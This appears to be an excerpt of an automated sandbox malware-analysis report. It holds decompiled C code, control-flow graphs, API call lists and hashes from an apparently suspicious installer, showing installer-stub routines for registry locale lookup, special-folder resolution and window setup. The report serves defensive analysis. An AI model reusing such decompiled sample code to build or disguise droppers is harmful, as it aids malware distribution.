                                                            • SetWindowTextA.USER32(?,0043C090), ref: 0040415D
                                                            • ShowWindow.USER32(?,0000000A), ref: 00404291
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID: <r
                                                            • API String ID: 121052019-2530491772
                                                            • Opcode ID: b673dabca76274c5076d0e044a6da74a23405ad17572b8bf379c5a70d32c39fe
                                                            • Instruction ID: 1a69bbab5f1dc0e71ac1873d296b8d42e3e712d362af29a70bde279b026b61fc
                                                            • Opcode Fuzzy Hash: b673dabca76274c5076d0e044a6da74a23405ad17572b8bf379c5a70d32c39fe
                                                            • Instruction Fuzzy Hash: 35C1F471900205AFDB216F61EE85E2B3A78FB86749F01053EFA41B21F1CB3898519B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403A3D Relevance: 40.5, APIs: 13, Strings: 10, Instructions: 215stringregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 302 403a3d-403a55 call 406663 305 403a57-403a67 call 4061b5 302->305 306 403a69-403a9a call 40613e 302->306 315 403abd-403ae6 call 403d02 call 405cd7 305->315 311 403ab2-403ab8 lstrcatA 306->311 312 403a9c-403aad call 40613e 306->312 311->315 312->311 320 403aec-403af1 315->320 321 403b6d-403b75 call 405cd7 315->321 320->321 322 403af3-403b17 call 40613e 320->322 327 403b83-403ba8 LoadImageA 321->327 328 403b77-403b7e call 4062ea 321->328 322->321 329 403b19-403b1b 322->329 331 403c29-403c31 call 40140b 327->331 332 403baa-403bda RegisterClassA 327->332 328->327 333 403b2c-403b38 lstrlenA 329->333 334 403b1d-403b2a call 405c14 329->334 346 403c33-403c36 331->346 347 403c3b-403c46 call 403d02 331->347 335 403be0-403c24 SystemParametersInfoA CreateWindowExA 332->335 336 403cf8 332->336 340 403b60-403b68 call 405be9 call 406257 333->340 341 403b3a-403b48 lstrcmpiA 333->341 334->333 335->331 339 403cfa-403d01 336->339 340->321 341->340 345 403b4a-403b54 GetFileAttributesA 341->345 350 403b56-403b58 345->350 351 403b5a-403b5b call 405c30 345->351 346->339 355 403c4c-403c66 ShowWindow call 4065f5 347->355 356 403ccf-403cd0 call 40544a 347->356 350->340 350->351 351->340 363 403c72-403c84 GetClassInfoA 355->363 364 403c68-403c6d call 4065f5 355->364 359 403cd5-403cd7 356->359 361 403cf1-403cf3 call 40140b 359->361 362 403cd9-403cdf 359->362 361->336 362->346 365 403ce5-403cec call 40140b 362->365 368 403c86-403c96 GetClassInfoA RegisterClassA 363->368 369 403c9c-403cbf DialogBoxParamA call 40140b 363->369 364->363 365->346 368->369 373 403cc4-403ccd call 40398d 369->373 373->339
                                                            C-Code - Quality: 96%
                                                            			E00403A3D(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x452430;
				_t17 = E00406663(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x43c090;
					 *0x483000 = 0x30;
					 *0x483001 = 0x78;
					 *0x483002 = 0;
					E0040613E(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x43c090, 0);
					__eflags =  *0x43c090;
					if(__eflags == 0) {
						E0040613E(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x43c090, 0);
					}
					lstrcatA(0x483000, _t74);
				} else {
					E004061B5(0x483000,  *_t17() & 0x0000ffff);
				}
				E00403D02(_t71, _t84);
				_t80 = "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes";
				 *0x4524a0 =  *0x452438 & 0x00000020;
				 *0x4524bc = 0x10000;
				if(E00405CD7(_t84, "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes") != 0) {
					L16:
					if(E00405CD7(_t92, _t80) == 0) {
						E004062EA(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
					}
					_t25 = LoadImageA( *0x452420, 0x67, 1, 0, 0, 0x8040);
					 *0x44e408 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D02(_t71, __eflags);
							__eflags =  *0x4524c0;
							if( *0x4524c0 != 0) {
								_t28 = E0040544A(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x44e3ec;
								if( *0x44e3ec == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x43c070, 5); // executed
							_t34 = E004065F5("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065F5("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x44e3c0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x44e3c0);
								 *0x44e3e4 = _t81;
								RegisterClassA(0x44e3c0);
							}
							_t39 = DialogBoxParamA( *0x452420,  *0x44e400 + 0x00000069 & 0x0000ffff, 0, E00403DDA, 0); // executed
							E0040398D(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x452420;
						 *0x44e3c4 = E00401000;
						 *0x44e3d0 =  *0x452420;
						 *0x44e3d4 = _t25;
						 *0x44e3e4 = 0x40a1f4;
						if(RegisterClassA(0x44e3c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x43c070 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x452420, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x44a3c0;
					E0040613E(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x452458, 0x44a3c0, 0);
					_t57 =  *0x44a3c0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x44a3c1;
						 *((char*)(E00405C14(0x44a3c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406257(_t80, E00405BE9(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C30(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                            0x00403a43
                                                            0x00403a4c
                                                            0x00403a53
                                                            0x00403a55
                                                            0x00403a69
                                                            0x00403a7b
                                                            0x00403a82
                                                            0x00403a89
                                                            0x00403a8f
                                                            0x00403a94
                                                            0x00403a9a
                                                            0x00403aad
                                                            0x00403aad
                                                            0x00403ab8
                                                            0x00403a57
                                                            0x00403a62
                                                            0x00403a62
                                                            0x00403abd
                                                            0x00403ac7
                                                            0x00403ad0
                                                            0x00403ad5
                                                            0x00403ae6
                                                            0x00403b6d
                                                            0x00403b75
                                                            0x00403b7e
                                                            0x00403b7e
                                                            0x00403b94
                                                            0x00403b9a
                                                            0x00403ba8
                                                            0x00403c29
                                                            0x00403c31
                                                            0x00403c3b
                                                            0x00403c40
                                                            0x00403c46
                                                            0x00403cd0
                                                            0x00403cd5
                                                            0x00403cd7
                                                            0x00403cf3
                                                            0x00000000
                                                            0x00403cf3
                                                            0x00403cd9
                                                            0x00403cdf
                                                            0x00403ce7
                                                            0x00403ce7
                                                            0x00000000
                                                            0x00403cdf
                                                            0x00403c54
                                                            0x00403c5f
                                                            0x00403c64
                                                            0x00403c66
                                                            0x00403c6d
                                                            0x00403c6d
                                                            0x00403c78
                                                            0x00403c80
                                                            0x00403c82
                                                            0x00403c84
                                                            0x00403c8d
                                                            0x00403c90
                                                            0x00403c96
                                                            0x00403c96
                                                            0x00403cb5
                                                            0x00403cc6
                                                            0x00000000
                                                            0x00403ccb
                                                            0x00403c33
                                                            0x00403c35
                                                            0x00000000
                                                            0x00403baa
                                                            0x00403baa
                                                            0x00403bb6
                                                            0x00403bc0
                                                            0x00403bc6
                                                            0x00403bcb
                                                            0x00403bda
                                                            0x00403cf8
                                                            0x00403cf8
                                                            0x00000000
                                                            0x00403cf8
                                                            0x00403be9
                                                            0x00403c24
                                                            0x00000000
                                                            0x00403c24
                                                            0x00403aec
                                                            0x00403aec
                                                            0x00403aef
                                                            0x00403af1
                                                            0x00000000
                                                            0x00000000
                                                            0x00403afb
                                                            0x00403b0b
                                                            0x00403b10
                                                            0x00403b17
                                                            0x00000000
                                                            0x00000000
                                                            0x00403b1b
                                                            0x00403b1d
                                                            0x00403b2a
                                                            0x00403b2a
                                                            0x00403b32
                                                            0x00403b38
                                                            0x00403b60
                                                            0x00403b68
                                                            0x00000000
                                                            0x00403b4a
                                                            0x00403b4b
                                                            0x00403b54
                                                            0x00403b5a
                                                            0x00403b5b
                                                            0x00000000
                                                            0x00403b5b
                                                            0x00403b56
                                                            0x00403b58
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403b58
                                                            0x00403b38

                                                            APIs
                                                              • Part of subcall function 00406663: GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                              • Part of subcall function 00406663: GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                            • lstrcatA.KERNEL32(00483000,0043C090,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C090,00000000,00000002,75572754,00485000,?,0047B000,00000009,0000000B), ref: 00403AB8
                                                            • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00483000,0043C090,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C090,00000000,00000002,75572754), ref: 00403B2D
                                                            • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00483000,0043C090,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C090,00000000), ref: 00403B40
                                                            • GetFileAttributesA.KERNEL32(Call,?,0047B000,00000009,0000000B), ref: 00403B4B
                                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes), ref: 00403B94
                                                              • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                            • RegisterClassA.USER32(0044E3C0), ref: 00403BD1
                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE9
                                                            • CreateWindowExA.USER32 ref: 00403C1E
                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403C54
                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,0044E3C0), ref: 00403C80
                                                            • GetClassInfoA.USER32(00000000,RichEdit,0044E3C0), ref: 00403C8D
                                                            • RegisterClassA.USER32(0044E3C0), ref: 00403C96
                                                            • DialogBoxParamA.USER32 ref: 00403CB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: .DEFAULT\Control Panel\International$.exe$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                            • API String ID: 1975747703-1037727787
                                                            • Opcode ID: 95bf514c9ea4fc9c592dd570d8c938eb6a532796c2675ae0dce3c92584506eb1
                                                            • Instruction ID: 9ed41b13b3066df8ef4fe5e21b3ba9d2433b63f5b2cc2a01767d3bc771330ebd
                                                            • Opcode Fuzzy Hash: 95bf514c9ea4fc9c592dd570d8c938eb6a532796c2675ae0dce3c92584506eb1
                                                            • Instruction Fuzzy Hash: A261B375644344AEE611AF669E45F3B3A6CEB4670EF00043FF941B62E3CA7C99019B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004062EA Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 198stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 598 4062ea-4062f5 599 4062f7-406306 598->599 600 406308-40631e 598->600 599->600 601 406512-406516 600->601 602 406324-40632f 600->602 604 406341-40634b 601->604 605 40651c-406526 601->605 602->601 603 406335-40633c 602->603 603->601 604->605 606 406351-406358 604->606 607 406531-406532 605->607 608 406528-40652c call 406257 605->608 609 406505 606->609 610 40635e-406392 606->610 608->607 612 406507-40650d 609->612 613 40650f-406511 609->613 614 4064b2-4064b5 610->614 615 406398-4063a2 610->615 612->601 613->601 618 4064e5-4064e8 614->618 619 4064b7-4064ba 614->619 616 4063a4-4063ad 615->616 617 4063bf 615->617 616->617 622 4063af-4063b2 616->622 625 4063c6-4063cd 617->625 620 4064f6-406503 lstrlenA 618->620 621 4064ea-4064f1 call 4062ea 618->621 623 4064ca-4064d6 call 406257 619->623 624 4064bc-4064c8 call 4061b5 619->624 620->601 621->620 622->617 627 4063b4-4063b7 622->627 634 4064db-4064e1 623->634 624->634 629 4063d2-4063d4 625->629 630 4063cf-4063d1 625->630 627->617 635 4063b9-4063bd 627->635 632 4063d6-4063f9 call 40613e 629->632 633 40640d-406410 629->633 630->629 646 406499-40649d 632->646 647 4063ff-406408 call 4062ea 632->647 639 406420-406423 633->639 640 406412-40641e GetSystemDirectoryA 633->640 634->620 638 4064e3 634->638 635->625 642 4064aa-4064b0 call 406535 638->642 644 406490-406492 639->644 645 406425-406433 GetWindowsDirectoryA 639->645 643 406494-406497 640->643 642->620 643->642 643->646 644->643 648 406435-40643f 644->648 645->644 646->642 651 40649f-4064a5 lstrcatA 646->651 647->643 653 406441-406444 648->653 654 406459-40646f SHGetSpecialFolderLocation 648->654 651->642 653->654 658 406446-40644d 653->658 655 406471-40648b SHGetPathFromIDListA CoTaskMemFree 654->655 656 40648d 654->656 655->643 655->656 656->644 659 406455-406457 658->659 659->643 659->654
                                                            C-Code - Quality: 72%
                                                            			E004062EA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				char _t50;
				char _t52;
				char _t54;
				void* _t62;
				char* _t63;
				signed int _t77;
				char _t85;
				void* _t86;
				CHAR* _t87;
				void* _t89;
				signed int _t94;
				signed int _t96;
				void* _t97;

				_t89 = __esi;
				_t86 = __edi;
				_t62 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x44e3fc - 4 + _t36 * 4);
				}
				_push(_t62);
				_push(_t89);
				_push(_t86);
				_t63 = _t36 +  *0x452458;
				_t37 = 0x44a3c0;
				_t87 = 0x44a3c0;
				if(_a4 >= 0x44a3c0 && _a4 - 0x44a3c0 < 0x4000) {
					_t87 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t85 =  *_t63;
					if(_t85 == 0) {
						break;
					}
					__eflags = _t87 - _t37 - 0x2000;
					if(_t87 - _t37 >= 0x2000) {
						break;
					}
					_t63 = _t63 + 1;
					__eflags = _t85 - 4;
					_a8 = _t63;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t87 = _t85;
							_t87 =  &(_t87[1]);
							__eflags = _t87;
						} else {
							 *_t87 =  *_t63;
							_t87 =  &(_t87[1]);
							_t63 = _t63 + 1;
						}
						continue;
					}
					_t39 =  *((char*)(_t63 + 1));
					_t77 =  *_t63;
					_t94 = (_t39 & 0x0000007f) << 0x00000007 | _t77 & 0x0000007f;
					_v24 = _t77;
					_v28 = _t77 | 0x00000080;
					_v16 = _t39;
					_v20 = _t39 | 0x00000080;
					_t63 = _a8 + 2;
					__eflags = _t85 - 2;
					if(_t85 != 2) {
						__eflags = _t85 - 3;
						if(_t85 != 3) {
							__eflags = _t85 - 1;
							if(_t85 == 1) {
								__eflags = (_t39 | 0xffffffff) - _t94;
								E004062EA(_t63, _t87, _t94, _t87, (_t39 | 0xffffffff) - _t94);
							}
							L42:
							_t87 =  &(_t87[lstrlenA(_t87)]);
							_t37 = 0x44a3c0;
							continue;
						}
						__eflags = _t94 - 0x1d;
						if(_t94 != 0x1d) {
							__eflags = (_t94 << 0xd) + 0x453000;
							E00406257(_t87, (_t94 << 0xd) + 0x453000);
						} else {
							E004061B5(_t87,  *0x452428);
						}
						__eflags = _t94 + 0xffffffeb - 7;
						if(_t94 + 0xffffffeb < 7) {
							L33:
							E00406535(_t87);
						}
						goto L42;
					}
					__eflags =  *0x4524dc;
					_t96 = 2;
					if( *0x4524dc != 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x4524a4;
						if( *0x4524a4 != 0) {
							_t96 = 4;
						}
						__eflags = _t77;
						if(__eflags >= 0) {
							__eflags = _t77 - 0x25;
							if(_t77 != 0x25) {
								__eflags = _t77 - 0x24;
								if(_t77 == 0x24) {
									GetWindowsDirectoryA(_t87, 0x2000);
									_t96 = 0;
								}
								while(1) {
									__eflags = _t96;
									if(_t96 == 0) {
										goto L30;
									}
									_t50 =  *0x452424;
									_t96 = _t96 - 1;
									__eflags = _t50;
									if(_t50 == 0) {
										L26:
										_t52 = SHGetSpecialFolderLocation( *0x452428,  *(_t97 + _t96 * 4 - 0x18),  &_v8);
										__eflags = _t52;
										if(_t52 != 0) {
											L28:
											 *_t87 =  *_t87 & 0x00000000;
											__eflags =  *_t87;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t87);
										_v12 = _t52;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t54 =  *_t50( *0x452428,  *(_t97 + _t96 * 4 - 0x18), 0, 0, _t87); // executed
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t87, 0x2000);
							goto L30;
						} else {
							E0040613E((_t77 & 0x0000003f) +  *0x452458, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t77 & 0x0000003f) +  *0x452458, _t87, _t77 & 0x00000040);
							__eflags =  *_t87;
							if( *_t87 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062EA(_t63, _t87, _t96, _t87, _v16);
							L30:
							__eflags =  *_t87;
							if( *_t87 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags =  *0x4524de - 0x45a;
					if( *0x4524de >= 0x45a) {
						goto L13;
					}
					__eflags = _t39 - 0x23;
					if(_t39 == 0x23) {
						goto L13;
					}
					__eflags = _t39 - 0x2e;
					if(_t39 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t87 =  *_t87 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00406257(_a4, _t37);
			}

























                                                            0x004062ea
                                                            0x004062ea
                                                            0x004062ea
                                                            0x004062f0
                                                            0x004062f5
                                                            0x00406306
                                                            0x00406306
                                                            0x0040630e
                                                            0x0040630f
                                                            0x00406310
                                                            0x00406311
                                                            0x00406314
                                                            0x0040631c
                                                            0x0040631e
                                                            0x00406335
                                                            0x00406338
                                                            0x00406338
                                                            0x00406512
                                                            0x00406512
                                                            0x00406516
                                                            0x00000000
                                                            0x00000000
                                                            0x00406345
                                                            0x0040634b
                                                            0x00000000
                                                            0x00000000
                                                            0x00406351
                                                            0x00406352
                                                            0x00406355
                                                            0x00406358
                                                            0x00406505
                                                            0x0040650f
                                                            0x00406511
                                                            0x00406511
                                                            0x00406507
                                                            0x00406509
                                                            0x0040650b
                                                            0x0040650c
                                                            0x0040650c
                                                            0x00000000
                                                            0x00406505
                                                            0x0040635e
                                                            0x00406362
                                                            0x00406372
                                                            0x00406379
                                                            0x0040637c
                                                            0x00406384
                                                            0x00406387
                                                            0x0040638e
                                                            0x0040638f
                                                            0x00406392
                                                            0x004064b2
                                                            0x004064b5
                                                            0x004064e5
                                                            0x004064e8
                                                            0x004064ed
                                                            0x004064f1
                                                            0x004064f1
                                                            0x004064f6
                                                            0x004064fc
                                                            0x004064fe
                                                            0x00000000
                                                            0x004064fe
                                                            0x004064b7
                                                            0x004064ba
                                                            0x004064cf
                                                            0x004064d6
                                                            0x004064bc
                                                            0x004064c3
                                                            0x004064c3
                                                            0x004064de
                                                            0x004064e1
                                                            0x004064aa
                                                            0x004064ab
                                                            0x004064ab
                                                            0x00000000
                                                            0x004064e1
                                                            0x00406398
                                                            0x004063a1
                                                            0x004063a2
                                                            0x004063bf
                                                            0x004063bf
                                                            0x004063c6
                                                            0x004063c6
                                                            0x004063cd
                                                            0x004063d1
                                                            0x004063d1
                                                            0x004063d2
                                                            0x004063d4
                                                            0x0040640d
                                                            0x00406410
                                                            0x00406420
                                                            0x00406423
                                                            0x0040642b
                                                            0x00406431
                                                            0x00406431
                                                            0x00406490
                                                            0x00406490
                                                            0x00406492
                                                            0x00000000
                                                            0x00000000
                                                            0x00406435
                                                            0x0040643c
                                                            0x0040643d
                                                            0x0040643f
                                                            0x00406459
                                                            0x00406467
                                                            0x0040646d
                                                            0x0040646f
                                                            0x0040648d
                                                            0x0040648d
                                                            0x0040648d
                                                            0x00000000
                                                            0x0040648d
                                                            0x00406475
                                                            0x0040647e
                                                            0x00406481
                                                            0x00406487
                                                            0x0040648b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040648b
                                                            0x00406441
                                                            0x00406444
                                                            0x00000000
                                                            0x00000000
                                                            0x00406453
                                                            0x00406455
                                                            0x00406457
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406457
                                                            0x00000000
                                                            0x00406490
                                                            0x00406418
                                                            0x00000000
                                                            0x004063d6
                                                            0x004063f1
                                                            0x004063f6
                                                            0x004063f9
                                                            0x00406499
                                                            0x00406499
                                                            0x0040649d
                                                            0x004064a5
                                                            0x004064a5
                                                            0x00000000
                                                            0x0040649d
                                                            0x00406403
                                                            0x00406494
                                                            0x00406494
                                                            0x00406497
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406497
                                                            0x004063d4
                                                            0x004063a4
                                                            0x004063ad
                                                            0x00000000
                                                            0x00000000
                                                            0x004063af
                                                            0x004063b2
                                                            0x00000000
                                                            0x00000000
                                                            0x004063b4
                                                            0x004063b7
                                                            0x00000000
                                                            0x004063b9
                                                            0x004063b9
                                                            0x00000000
                                                            0x004063b9
                                                            0x004063b7
                                                            0x0040651c
                                                            0x00406526
                                                            0x00406532
                                                            0x00406532
                                                            0x00000000

                                                            APIs
                                                            • GetSystemDirectoryA.KERNEL32(Call,00002000), ref: 00406418
                                                            • GetWindowsDirectoryA.KERNEL32(Call,00002000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,004053B0,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000), ref: 0040642B
                                                            • SHGetSpecialFolderLocation.SHELL32(004053B0,7555110C,?), ref: 00406467
                                                            • SHGetPathFromIDListA.SHELL32(7555110C,Call), ref: 00406475
                                                            • CoTaskMemFree.OLE32(7555110C), ref: 00406481
                                                            • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064A5
                                                            • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,004053B0,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,00000000,0042CE48,7555110C), ref: 004064F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
